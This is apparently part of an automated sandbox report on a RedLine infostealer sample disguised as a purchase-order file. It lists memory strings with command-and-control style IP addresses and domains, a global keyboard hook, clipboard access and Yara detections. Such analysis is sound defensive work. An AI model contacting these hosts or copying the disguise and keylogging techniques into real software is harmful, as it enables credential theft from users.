Source: alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.213.104.86:80/kfucjjkorih
Source: alg.exe, 00000006.00000003.2156815430.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/1
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2156815430.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/3
Source: alg.exe, 00000006.00000003.2156815430.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/3k
Source: alg.exe, 00000006.00000003.2767578204.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2827357031.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2788435260.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2657080595.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2866913442.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/ccaldaoawyay
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/ccrsdbhein
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/ccrsdbheinq
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/lix
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/lixO
Source: alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/ngs
Source: alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/ngs;
Source: alg.exe, 00000006.00000003.2156815430.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2156038418.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/qjmcjynbe
Source: alg.exe, 00000006.00000003.2156815430.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/qjmcjynbenmhcsc
Source: alg.exe, 00000006.00000003.2156815430.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/sattbfx
Source: alg.exe, 00000006.00000003.2144815434.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105/sattbfxc
Source: alg.exe, 00000006.00000003.2156815430.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/qjmcjynbe
Source: alg.exe, 00000006.00000003.2144815434.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://44.221.84.105:80/sattbfx
Source: alg.exe, 00000006.00000003.2081257247.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2081257247.0000000000522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/
Source: alg.exe, 00000006.00000003.2081257247.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/3
Source: alg.exe, 00000006.00000003.2827357031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/38UU
Source: alg.exe, 00000006.00000003.2081257247.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/3O
Source: alg.exe, 00000006.00000003.2827357031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/P
Source: alg.exe, 00000006.00000003.2827357031.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2919770823.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2866913442.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/gss
Source: alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/hnor
Source: alg.exe, 00000006.00000003.2081257247.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/rcdhheuvsu
Source: alg.exe, 00000006.00000003.2081257247.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/rcdhheuvsungs
Source: alg.exe, 00000006.00000003.2827357031.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/skudpvsbobr
Source: alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2097746402.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/thnor
Source: alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/thnorfupl
Source: alg.exe, 00000006.00000003.2081257247.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212/w
Source: alg.exe, 00000006.00000003.2081257247.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212:80/rcdhheuvsu
Source: alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.129.31.212:80/thnoruvsu
Source: alg.exe, 00000006.00000003.1805613822.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2118218789.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2081257247.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/)
Source: alg.exe, 00000006.00000003.1805613822.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/W
Source: alg.exe, 00000006.00000003.1805613822.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/Wp%XG
Source: microsofts.exe, 00000004.00000003.1816024816.00000000052DE000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.1816196442.00000000052DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/atfsybxv
Source: alg.exe, 00000006.00000003.1794897070.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1805271215.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1794740931.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1805613822.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/gdxe
Source: alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/s
Source: alg.exe, 00000006.00000003.2517221404.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/s3
Source: alg.exe, 00000006.00000003.1805948107.0000000000579000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1805271215.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1805613822.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/tynxrhlkri
Source: alg.exe, 00000006.00000003.2517221404.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/unbrcr
Source: alg.exe, 00000006.00000003.2517221404.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/unbrcrq
Source: alg.exe, 00000006.00000003.1794897070.000000000055D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/w
Source: alg.exe, 00000006.00000003.1860570785.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/xefutga
Source: alg.exe, 00000006.00000003.1943268512.000000000057E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/dgdkhxcfkna30-9FD785CD71B6
Source: alg.exe, 00000006.00000003.2023146343.000000000057E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/dhwxqyxtm
Source: build.exe, 0000000B.00000002.1941870449.000000000094E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: alg.exe, 00000006.00000003.2183000451.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134781228.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2202750803.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2156815430.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2175491692.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2118218789.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2081257247.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: build.exe, 0000000B.00000002.1946375903.0000000002774000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: alg.exe, 00000006.00000003.2788435260.0000000000528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vrrazpdh.biz/
Source: microsofts.exe, 00000004.00000003.2186972016.00000000062D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: microsofts.exe, 00000004.00000003.2073816640.00000000062D0000.00000004.00001000.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000005.00000002.1795311525.0000000012787000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000005.00000002.1795311525.00000000127D2000.00000004.00000800.00020000.00000000.sdmp, Native_Redline_BTC.exe, 00000005.00000002.1795311525.00000000126F9000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000000.1782677998.0000000000332000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: microsofts.exe, 00000004.00000003.2289955796.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: microsofts.exe, 00000004.00000003.2290998834.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000004.00000003.2291225690.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: build.exe, 0000000B.00000002.1946375903.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1958158367.0000000003994000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000B.00000002.1946375903.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\microsofts.exe

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00459FFF

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_00459FFF
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00459FFF

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

0_2_00456354

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_0047C08E
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_0047C08E

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.svchost.exe.5c00000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.0.microsofts.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1767717625.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00434D50

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_004461ED

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		0_2_004364AA
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		2_2_004364AA

Source: C:\Windows\System32\alg.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\76fb15a314ced2a4.bin
Source: C:\Windows\System32\wbengine.exe	File created: C:\Windows\Logs\WindowsBackup

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00409A40	0_2_00409A40
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00412038	0_2_00412038
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0047E1FA	0_2_0047E1FA
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0041A46B	0_2_0041A46B
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0041240C	0_2_0041240C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004045E0	0_2_004045E0
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00412818	0_2_00412818
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0047CBF0	0_2_0047CBF0
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0044EBBC	0_2_0044EBBC
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00412C38	0_2_00412C38
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0044ED9A	0_2_0044ED9A
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00424F70	0_2_00424F70
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0041AF0D	0_2_0041AF0D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00427161	0_2_00427161
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004212BE	0_2_004212BE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00443390	0_2_00443390
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00443391	0_2_00443391
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0041D750	0_2_0041D750
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_004037E0	0_2_004037E0
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00427859	0_2_00427859
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0040F890	0_2_0040F890
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0042397B	0_2_0042397B
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00411B63	0_2_00411B63
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00423EBF	0_2_00423EBF
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0567CB08	0_2_0567CB08
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00409A40	2_2_00409A40
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00412038	2_2_00412038
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0047E1FA	2_2_0047E1FA
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0041A46B	2_2_0041A46B
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0041240C	2_2_0041240C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004045E0	2_2_004045E0
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00412818	2_2_00412818
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0047CBF0	2_2_0047CBF0
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0044EBBC	2_2_0044EBBC
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00412C38	2_2_00412C38
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0044ED9A	2_2_0044ED9A
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00424F70	2_2_00424F70
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0041AF0D	2_2_0041AF0D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00427161	2_2_00427161
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004212BE	2_2_004212BE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00443390	2_2_00443390
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00443391	2_2_00443391
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0041D750	2_2_0041D750
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_004037E0	2_2_004037E0
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00427859	2_2_00427859
